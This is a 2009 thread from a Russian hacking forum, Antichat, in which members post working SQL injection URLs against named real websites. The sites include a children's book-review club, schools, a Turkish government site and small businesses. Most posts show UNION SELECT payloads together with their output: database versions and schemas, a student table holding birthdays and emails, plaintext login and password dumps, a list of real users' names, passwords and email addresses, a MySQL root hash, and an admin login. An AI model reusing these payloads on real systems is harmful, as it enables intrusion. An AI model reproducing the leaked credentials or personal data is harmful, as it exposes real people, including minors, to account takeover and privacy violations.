HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #9681  
Старый 05.06.2009, 00:15
AlexSatter
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802

Репутация: 298
По умолчанию

http://www.spaghettibookclub.org/student.php?student_id=-5151+union+select+1,2,3,4,version(),6,7,8,9,10,11, 12,13,14,15
5.0.77-community-log
Pr 5

структура БД
Код:
Database [spaghett_bookclub]
    Table [spb_access_type  ( Rows)]
        access_type_id
        name
    Table [spb_account_type  ( Rows)]
        account_type_id
        name
    Table [spb_author  ( Rows)]
        author_id
        last_name
        first_name
    Table [spb_book  ( Rows)]
        book_id
        title
        alpha_title
        author_id
        illustrator
        publisher
        pages
    Table [spb_book_genre_xref  ( Rows)]
        book_genre_id
        book_id
        genre_id
    Table [spb_book_theme_xref  ( Rows)]
        book_theme_id
        book_id
        theme_id
    Table [spb_class  ( Rows)]
        class_id
        clubhouse_active
        school_id
        school_year
        name
        color_schema_id
        teacher_lname
        teacher_fname
        teacher_hon
        teach_name
        status
        grade_level
        grade_level2
        signup_date
        expire_date
        completion_status
        prog_desc
        paid_for_reviews
        payment_recieved
        payment_note
        sponsor
        new
        alt_grade_desc
        direct_image_upload
        sponsor_image_id
        class_size
        teach_title
        teach_phone
    Table [spb_class_access  ( Rows)]
        class_access_id
        class_id
        access_type_id
    Table [spb_color_schema  ( Rows)]
        schema_id
        name
        bg_color
        text_color
    Table [spb_genre  ( Rows)]
        genre_id
        name
    Table [spb_image  ( Rows)]
        image_id
        extension
        name
    Table [spb_image_assoc  ( Rows)]
        assoc_id
        image_id
        critic_id
        group_id
    Table [spb_member  ( Rows)]
        member_id
        critic_id
        group_id
        grade
        image_id
    Table [spb_member_review_xref  ( Rows)]
        member_review_id
        review_id
        member_id
        screen_name
        age
        city
        state
    Table [spb_multigroup  ( Rows)]
        multi_id
        student_id1
        student_id2
    Table [spb_publisher  ( Rows)]
        publisher_id
        name
    Table [spb_review  ( Rows)]
        review_id
        class_id
        book_id
        image_id
        status
        creation_date
        editable
        review_text
        grade1
        grade2
    Table [spb_review_revision_xref  ( Rows)]
        review_id
        revision_id
    Table [spb_revision  ( Rows)]
        revision_id
        revision
    Table [spb_school  ( Rows)]
        school_id
        group_type_id
        url
        name
        address1
        address2
        city
        state
        zipcode
        district
        phone
        principal
        color_schema_id
        status
        image_id
        note
        new
        country
        sponsor
        sponsor_image_id
    Table [spb_session  ( Rows)]
        session_id
        code
        user_id
        last_access
    Table [spb_student  ( Rows)]
        student_id
        class_id
        first_name
        last_name
        screen_name
        birthday
        email
        color_schema_id
        portrait_id
        gender
        consent
        city
        state
        grade
    Table [spb_student_restore  ( Rows)]
        student_id
        class_id
        first_name
        last_name
        screen_name
        birthday
        email
        color_schema_id
        portrait_id
        gender
        consent
    Table [spb_student_review_xref  ( Rows)]
        student_review_id
        student_id
        review_id
    Table [spb_theme  ( Rows)]
        theme_id
        name
    Table [spb_user  ( Rows)]
        user_id
        username
        password
        last_name
        first_name
        honorific
        email
        account_type_id
        sub_type_id
        status
        classroom_id
        school_id
        group_id
        individual_id
        family_id
    Table [state  ( Rows)]
        abbr
        name
юзеры и пассворды:
Код:
[0]:1:julie:topaz
[1]:2:mattison:cunnilingus
[2]:736:tamrunr:tamrunr
[3]:4:staff person:staff
[4]:829:dsalewski:prejs
[5]:7:julieann:teacher
[6]:801:bmiles:olive79
[7]:719:elsevier:recares
[8]:865:sundaytest:sundaytest
[9]:826:smorlan:stobildn
[10]:916:cruzm01:cruzm01
[11]:22:school1:school2
[12]:892:Dione:johnmayer
[13]:738:juliesddff:jluiesdf
[14]:1036:mtest:cunnilingus
[15]:1001:dogs:drool
[16]:873:aflores:lolita67
[17]:35:tlc:marcya1
[18]:36:school:school
[19]:922:jesslura:jesslura1
[20]:38:armory:summer
[21]:517::
[22]:40:jr:afterschool
[23]:41:mike:pickering
[24]:523::
[25]:860:test:test
[26]:867:est51er:jeanne
[27]:902:bsandford:brooks
[28]:942:suneedai:psalm233
[29]:64:rosemarin:ann
[30]:869:dude:dude
[31]:594:murray:murray
[32]:929:mpgrantham:mpgrantham
[33]:841:edwardscl:Benson
[34]:912:skpatters:k50k50
[35]:640:nycares:spring09
[36]:906:may9july:1294
[37]:911:ubarrera:fall
[38]:828:lgteach:dozie1
[39]:878:lonkhan:shanda35
[40]:817:nycares1:spring1
[41]:930:henzdawn:dhphdh
[42]:835:wildwoodms:warriors
[43]:522::
[44]:807:metropt2:4467
[45]:737:dleipsic:dleipsic
[46]:734:kprice:touchstone
[47]:924:maddog:maddog6
[48]:910:kellkamm:red2468
[49]:568::
[50]:904:pettitt:pettitt
[51]:834:weaver:#48winner
[52]:856:asdfXX:asdfXX
[53]:920:benji:ell2
[54]:880:mitchell:mitchell5
[55]:862:rakina81:tiakari
[56]:395:bethjnj:ethel
[57]:866:pams:2123
[58]:382::
[59]:381::
[60]:380::
[61]:135:ClassGuest:password
[62]:845:lkoertzen:owenmeany
[63]:861:jenmatsuno:jen725
[64]:836:nighthawk:common
[65]:891:thomasb16:honeybee
[66]:844:metrobapt:4464
[67]:852:ksalmon:blue21
[68]:851:jclaessens:gojillgo
[69]:859:forgetme:forgetme
[70]:918:sinman:keeley00
[71]:883:mpierce:beach
[72]:864:tstafford:tomboy
[73]:452:Barb:amberK
[74]:914:dawnblad:45744
[75]:888:wwinchel:magoo
[76]:839:avaldez:hulkster
[77]:379::
[78]:884:weitzmac:hannah
[79]:712:MrsSerna:saja
[80]:561::
[81]:877:stagrade1:firstgrade
[82]:895:juliefour:Elliottr4
[83]:838:Suzwoo:stwenc76
http://digitalmedia.massey.ac.nz/exposure/student.php?id=6+and+substring(version(),1,1)=5

PR 5

http://www.impacttest.com/doctor.php?id=-2911+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7 873716C696E6A626567696E,Version(),0x2F2A2A2F,Datab ase(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),0x 71),0x71),21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38,39,40,41,42,43,44/*

Database Version: 4.1.22-standard
Database name: impact_impacttest
User name: impact_impact@localhost


нашел таблицу users. поле username подобрал, где хранится пароль.. нет. юзеры:
mawheatley
test
impact
workshops

Последний раз редактировалось AlexSatter; 05.06.2009 в 01:09..
 
Ответить с цитированием

  #9682  
Старый 05.06.2009, 07:49
-JC-
Познающий
Регистрация: 10.03.2009
Сообщений: 54
Провел на форуме:
110312

Репутация: 50
Отправить сообщение для -JC- с помощью ICQ
По умолчанию

http://www.fremontonline.org/menu1.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user,password) +from+mysql.user+--+
 
Ответить с цитированием

  #9683  
Старый 05.06.2009, 08:07
AlexSatter
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802

Репутация: 298
По умолчанию

PR1, ТИЦ 10
http://videotor.com/raz.php?a=2&id_them=-110+UNION+SELECT+CONCAT(0x7873716C696E6A626567696E ,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User() ,0x7873716C696E6A656E64)

Database Version: 5.0.45
Database name: videotor_blog
User name: videotor@localhost


Структура БД

Код:
Database [videotor_blog]
    Table [coment  ( Rows)]
        id_user
        id_post
        id_coment
        coment
        date_time
        sec_post_coment
    Table [favorit  ( Rows)]
        id_user
        id_post
    Table [post  ( Rows)]
        name
        id_user
        id_post
        anons
        url
        reiting
        id_them
        date_post
        time_post
        sec_post
        key_words
        dlitel
        resol
        size
        flag
        count
    Table [reiting  ( Rows)]
        id_user
        id_post
    Table [them  ( Rows)]
        id_them
        name
        opis
        key
    Table [users  ( Rows)]
        name
        surname
        login
        password
        id_user
        mail
        reiting
        brith_day
        home_url
        icq
        about
        lang
        photo
        stat
        last_time
        last_date
        sesionid
        last_time_sec
        schet
юзеры и пассы в виде: name,surname,login,password,id_user,mail

Код:
0]:Content:Manager:Bot:ghbpthdfnbd:1:bot@videotor.com
[1]:Вячеслав:Васильченко:Slayer:COUNTer:2:slayer@dubna.ru
[2]:Олег:Терновой:oleg:ghbpthdfnbd:100:oleg1251@mail.ru
[3]:Sergey:Ternovoy:sergey:kiskis:101:sergey@videotor.com
[4]:Антон:Щербаков:anton:kiskis:102:anton@videotor.com
[5]:kisa:kisa:kisa:kiskis:103:kisa@videotor.com
[6]:юра:киевлянин:yrak:070962:104:kyv@gasdob.com.ua
[7]:Женя:А:Jan0000:0000:105:restrade@mail.ru
[8]:МИша:Мишин:Bobennes:1:106:vovannes@mail.ru
[9]:Наталья:Гюнтер:brigit:12345:107:kirillova@kescom.com
[10]:Роман:ЕГоров:dogs:re20do06:108:regor@rambler.ru
[11]:Vlad:Vladq:abap44:viking01:109:pstock44@gmail.com
[12]:K.:K:K-9:1247004:111:zaviazkin@yahoo.com
[13]:ig:ma:dichovsky:42:112:dich_42@ukr.net
[14]:sergey:zu:serg5555555:7030604:113:sergejj-zu@rambler.ru
[15]:Андрей:А:aasn:alexdll:114:aasn@yandex.ru
[16]:Олег:Владимиров:Arboozz:ФЫВАПР:115:Arboozz@meta.ua
[17]:Вал:Мороз:morozval:zenith:116:morozval@yandex.ru
[18]:Алексей:Смородский:еблотрон:719winston:117:smorodsky81@mail.ru
[19]:r126:r126:r126:wert:118:r126@mail.ru
[20]:dasha:karaeva:dashak:8706885137:119:dasha-karaeva@yandex.ru
[21]:Ник:Сух:korvin:nics1983:120:graf_x_83@mail.ru
[22]:Raul:Blanco:Raul:900raul7:121:raul_foolhardy@yahoo.com
[23]:Oleg:mydrik:Svityashko:170786:122:Mydrik1@mail.ru
[24]:Aleks:Yn:a1eks:421374:123:aleks_yn@list.ru
[25]:Sarma:Extreme Tours:sarma:kolonel:124:sivis01@yahoo.com
[26]:Yury:v:yuryvik:1beavis:125:yuryvik@gmail.com
[27]:Андрей:Данилов:Anh:9162719595:126:700cd@rambler.ru
[28]:САША:В:VIG13:130482:127:VIG13@MAIL.RU
[29]:Серж:Иванов:qwertyus:94519121970:128:qwertyus@bigmir.net
[30]:Олег:Константинов:Sheff:wynnedes:129:olegomen@mail.ru
[31]:Кудрин:Виктор:avalon_1984:652819:130:avalon@topol.dp.ua
[32]:livon2000:livonov:livon2000:1571524572:131:maga-maga2000
[33]:Алексей:Храпский:aleks101:EVd-E3a_:132:aleks101_1@mail.ru
[34]:Ermolin:Andrey:EagleNN:qazxsw:133:sale@mail.nnov.ru
[35]:izz:zx:izz:138fuckoff:134:fuc@off.ru
[36]:Denis:Denisoff:rasputin2kiss:qwertyuiop:135:rasputin2kiss@rambler.ru
[37]:Fenriz:Liendmann:Fenriz:562883091:136:eumel666@mail.ru
[38]:Alex:Cast:Redox:qazxcvbnm:137:aka44@hotmail.com
[39]:hayot.org:hayot.org:hayot.org:hayot.org:138:hayot.org@mail.ru
[40]:Dom:Numa:LoL:zxcvbnm:139:naverno9@ebanat.com
[41]:Alexey:Lee:Alee:710447:140:aleezhankin@mail.ru
[42]:1:2:SatanKlaus:123321:141:igorev@mail.ru
[43]:Oleg:Oleg:98-1:djam98:142:98-1@mail.ru
[44]:kosandre:kosandre:kosandre:13611361:143:kosandre@ukr.net
[45]:Руслан:Шкаликов:Jackas:vfhbyf:144:jackas@bigmir.net
[46]:Serega:Golubec:serega_killer:111111:145:serega_killer83@list.ru
[47]:Emil:Rakhimov:mildox:not1found:146:emil@rakhimov.biz
[48]:Alexandr:Smirnov:jh8185g:232jx8185g:147:7350485@mail.ru
[49]:Yura:My:yurami:i6766xsh:148:yurami@list.ru
[50]:Gustav:Gustavson:Gustav:dublin:149:jevgenij2003@inbox.lv
[51]:Andrew:Otvertka:Otvertka:3213123:150:otvertka@main.ru
[52]:олег:макаров:mccarov:4261914:151:mccarov@mail.ru
[53]:Михаил:Дозвонов:shitmaker:fuckda1038:152:beer_crew@rambler.ru
[54]:Paata:Tsiwtsiwadze:ipaata:123456789:153:ipaata@yahoo.com
[55]:Иван:Иваныч:miner:911:154:4v-miner@mail.ru
[56]:A:S:ReDragon:oo28954:155:redragon@hotmail.ru
[57]:push:brush:push_brush:ub99875:156:push_brush@rambler.ru
[58]:Alexander:Lesnyakov:AlexCult:videotor:157:AlexCult@mail.ru
[59]:Владимир:Прагматов:Sworog:pragmaticorama:158:pragmaticorama@mail.ru
[60]:vitalii:ishenko:piet:7063282869:159:zugres@mail/

etc...
-------------

http://www.vykihendy.com/raz.php?id=-50+UNION+SELECT+1,2,3,4,CONCAT(0x7873716C696E6A626 567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F ,User(),0x7873716C696E6A656E64),6/*

Database Version: 5.0.51a-log
Database name: vykidb
User name: vykihendy@localhost


-------------
PR 2, ТИЦ 20
http://www.eldis-holding.ru/raz.php?id_raz=-7+UNION+SELECT+1,2,3,4,5,6,7,8,9,CONCAT(0x7873716C 696E6A626567696E,Version(),0x2F2A2A2F,Database(),0 x2F2A2A2F,User(),0x7873716C696E6A656E64),11,12/*

Database Version: 4.1.22-log
Database name: eldisho3_eldis
User name: eldisho3@localhost


Есть таблица admin, нашел два поля: id, password
3 записи.

-------------
PR 7
http://www.iett.gov.tr/sss.php?id=14+and+substring(version(),1,1)=5
------------

http://www.mappn.com/soft.php?id=2+and+substring(version(),1,1)=5
------------
http://www.dood.ru/soft.php?id_producer=-54+UNION+SELECT+1,2,AES_DECRYPT(AES_ENCRYPT(CONCAT (0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,D atabase(),0x2F2A2A2F,User(),0x7873716C696E6A656E64 ),0x71),0x71),4,5,6,7,8/*

Database Version: 4.1.22-standard
Database name: dood_gsms
User name: dood_admin@localhost
------------
PR 5

http://www.longfordceb.ie/news/index.php?catid=19&subid=1&nid=-39+UNION+SELECT+CONCAT(0x7873716C696E6A626567696E, Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(), 0x7873716C696E6A656E64),2/*

Database Version: 5.0.45-community-log
Database name: paulgre_ceb
User name: paulgre_site@web9.hosting365.ie

Последний раз редактировалось AlexSatter; 05.06.2009 в 10:07..
 
Ответить с цитированием

  #9684  
Старый 05.06.2009, 11:46
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

PR 5
http://www.peppermint-jam.de/newb/news.php?id=-1+union+select+1,2,concat_Ws(0x3a,user(),database( ),version()),4,5,6,7,8,9,10,11--&lang=en&lang=en

booking@localhostjcmsb:5.0.32-Debian_7etch8-log
 
Ответить с цитированием

  #9685  
Старый 05.06.2009, 11:50
AlexSatter
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802

Репутация: 298
По умолчанию

http://www.manualguitar.ru/urok.php?w=-57+UNION+SELECT+1,CONCAT(0x7873716C696E6A626567696 E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User( ),0x7873716C696E6A656E64),3

Database Version: 5.1.32-community-log
Database name: Dkfmxjh_guitar
User name: Dkfmxjh_guitar@91.195.124.11
 
Ответить с цитированием

  #9686  
Старый 05.06.2009, 11:54
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

http://www.ig-schuerenweg.de/news.php?id=1+union+select+1,concat_ws(0x3a,user() ,database(),version()),3,4,5,6--

dbu1141895@localhost:db1141895-1:5.0.32-Debian_7etch10-log

tables resse,news
 
Ответить с цитированием

  #9687  
Старый 05.06.2009, 12:48
AlexSatter
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802

Репутация: 298
По умолчанию

http://www.bazywiedzy.com/zadanie.php?id_task=-11+UNION+SELECT+1,CONCAT(0x7873716C696E6A626567696 E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User( ),0x7873716C696E6A656E64),3,4,5,6,7,8

Database Version: 5.1.33-log
Database name: xwm62598_baza1
User name: xwm62598_hamer2@swarog.az.pl


Таблицы:

Код:
Database [xwm62598_baza1]
    Table [application  ( Rows)]
    Table [chemical_formula  ( Rows)]
    Table [downloaded_app  ( Rows)]
    Table [formula  ( Rows)]
    Table [function  ( Rows)]
    Table [game_code  ( Rows)]
    Table [gielda_pracy_oferty  ( Rows)]
    Table [group  ( Rows)]
    Table [groups  ( Rows)]
    Table [lesson  ( Rows)]
    Table [lesson_student  ( Rows)]
    Table [login_status  ( Rows)]
    Table [messages  ( Rows)]
    Table [riddle  ( Rows)]
    Table [status  ( Rows)]
    Table [student  ( Rows)]
    Table [task_formula  ( Rows)]
    Table [tasks  ( Rows)]
 
Ответить с цитированием

  #9688  
Старый 05.06.2009, 12:50
udman
Постоянный
Регистрация: 21.04.2009
Сообщений: 321
Провел на форуме:
785842

Репутация: 239
По умолчанию

http://logua.com
Цитата:
http://logua.com/ru/kom.php?id=-3+UNION+SELECT+1,2,concat_ws(0x0b,user(),ver sion(),database()),4,5,6,7,8,9,10,11,12,13,14,15,1 6,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32, 33,34+--+
u_logua@localhost
4.1.22-log
logua

http://www.bazar.nikolaev.ua
Цитата:
http://www.bazar.nikolaev.ua/print.php?id=-356+UNION+SELECT+0,1,2,3,4,5,concat_ws(0x0b,user() ,ver sion(),database()),7,8,9,10,11,12,13,14+--+
bazar_old@apollo
4.1.22-log
bazar_old


http://www.bib.com.ua
Цитата:
http://www.bib.com.ua/summary.php?id=-94642+UNION+SELECT+0,concat_ws(0x0b,use r(),version(),database()),2,3,4,5,6,7,8,9,10,11,12
bibcom_exhaustic@localhost
5.0.45-community
bibcom_newbib

http://www.bikeshop.dp.ua
Цитата:
http://www.bikeshop.dp.ua/articles.php?id=-101+UNION+SELECT+1,concat_ws(0x0b,us er(),version(),database())
bikeforu_bikefor@localhost
5.0.45-log
bikeforu_site

http://www.koss.com.ua
Цитата:
http://www.koss.com.ua/publication.php?id=-1200+UNION+SELECT+0,1,2,con cat_ws(0x0b,user(),version(),database()),4,5,6,7,8 ,9,10
dbuser@localhost
4.1.22-log
itkom

http://music-car.com.ua
Цитата:
http://music-car.com.ua/prew.php?id=-1234'+UNION+SELECT+0,concat_Ws(0x0b,user(),version (),datab ase()),2,3,4,5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 ,27,28,29+/*
u_musiccar@localhost
4.1.22-log
musiccar
 
Ответить с цитированием

  #9689  
Старый 05.06.2009, 13:09
AlexSatter
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802

Репутация: 298
По умолчанию

http://www.sovinterior.ru/nomer.php?n=-46+UNION+SELECT+1,2,3,4,5,6,CONCAT(0x7873716C696E6 A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A 2A2F,User(),0x7873716C696E6A656E64),8

Database Version: 5.0.58-log
Database name: sovint
User name: si@localhost


Код:
Database [sovint]
    Table [about  ( Rows)]
    Table [adv_advertisers  ( Rows)]
    Table [adv_banners  ( Rows)]
    Table [adv_brands  ( Rows)]
    Table [adv_categories  ( Rows)]
    Table [adv_proposes  ( Rows)]
    Table [anons  ( Rows)]
    Table [baner  ( Rows)]
    Table [gost  ( Rows)]
    Table [img_stat  ( Rows)]
    Table [link_razd  ( Rows)]
    Table [link_sv  ( Rows)]
    Table [links  ( Rows)]
    Table [names  ( Rows)]
    Table [names_img  ( Rows)]
    Table [names_obj  ( Rows)]
    Table [news  ( Rows)]
    Table [news_img  ( Rows)]
    Table [nomer  ( Rows)]
    Table [podp  ( Rows)]
    Table [reklama  ( Rows)]
    Table [stati  ( Rows)]
    Table [tema  ( Rows)]
    Table [zapret  ( Rows)]

-------------------

http://www.sibuch.ru/nomer.php?cod=-34+UNION+SELECT+1,CONCAT(0x7873716C696E6A626567696 E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User( ),0x7873716C696E6A656E64),3,4,5,6,7,8,9

Database Version: 4.1.20
Database name: go
User name: go@localhost


доступна mysql.user

http://www.sibuch.ru/nomer.php?cod=-34+UNION+SELECT+1,concat_ws(0x3a,user,password),3, 4,5,6,7,8,9+FROM+mysql.user

root:4983f4fc2c0bc60f

etc...
 
Ответить с цитированием

  #9690  
Старый 05.06.2009, 14:09
udman
Постоянный
Регистрация: 21.04.2009
Сообщений: 321
Провел на форуме:
785842

Репутация: 239
По умолчанию

http://www.transammiak.com.ua

Цитата:
http://www.transammiak.com.ua/index.php?node=-24/**/UNION/**/SELECT/**/0,1,concat_ws(0x0b,user(),version( ),database( )),3,4,5,6,7,8,9--&lng=ru
transammiak_com_@localhost
5.0.81
transammiak_com_ua

Цитата:
http://www.transammiak.com.ua/index.php?node=-24/**/UNION/**/ SELECT/**/0,1,concat_ws(0x0b,table _name,colu mn_ name),3,4,5,6,7,8,9+FROM+INFORMATION_SCHEMA.COLUMN S--&lng=ru
таблы

Цитата:
http://www.transammiak.com.ua/index.php?node=-24/**/UNION/**/SELECT/**/ 0,1,concat _ws(0x0b,email,pass, login),3,4,5,6,7,8,9+FROM+users--&lng=ru
Админы
Логин: админНаАнгл
Пасс: amiak

http://www.transammiak.com.ua/админНаАнгл/
Админка


http://www.kazakh.ru
Цитата:
http://www.kazakh.ru/talk/mmess.phtml?idt=-33539+UNION+SELECT+0,UNHEX(HEX(concat_ws(0x0b,user () ,version( ),database()))),2,3,4,5,6,7,8,9,10,11,12,13
kazakh@server5.barik.pp.ru
4.1.13
kazakh
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ